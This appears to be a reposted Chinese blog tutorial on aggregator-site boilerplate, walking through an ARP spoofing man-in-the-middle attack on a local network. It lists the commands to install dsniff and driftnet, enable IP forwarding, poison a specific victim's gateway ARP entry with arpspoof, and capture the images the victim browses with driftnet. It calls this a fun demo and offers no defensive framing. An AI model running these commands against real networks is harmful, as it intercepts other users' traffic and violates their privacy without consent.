arp内网欺骗

编程入门 行业动态 更新时间:2024-10-24 17:21:29

感觉好玩就发出来让大家开心。。。技术含量不高,大牛就绕过吧

环境

ipmackali192.168.34.8000:0c:29:69:8e:09受害主机192.168.34.6900-E0-4C-36-1E-D9

kali需要有两个工具:arpspoofdriftnet

没有arpspoof,执行以下代码安装,网上还安装了其他的,但我只安装了dsniff就可以使用arpspoof命令。

apt-get install dsniff

没有driftnet直接apt-get。

apt-get install driftnet

下面这行代码也要执行。为了开启ip转发功能。不转发的话,受害者机器就断网了。

echo 1 > /proc/sys/net/ipv4/ip_forward;

环境差不多了,开始攻击了

攻击

执行ifconfig命令查看本机网卡名称和ip地址

在kali中执行命令:arpspoof -t 目标ip 网关ip -i 网卡

arpspoof -t 192.168.34.69 192.168.34.254 -i eth0


受害者主机wireshark抓包就可以看见已经被欺骗,192.168.34.254的网关地址被欺骗为了kali的mac地址

再打开一个命令行执行:driftnet -i 网卡

driftnet -i eth0

此时受害者访问百度图片。


随意点击一张图片,kali成功抓取到受害者的图片。

更多推荐

内网,arp

本文发布于:2023-05-25 10:56:34,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/226634.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:内网   arp

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!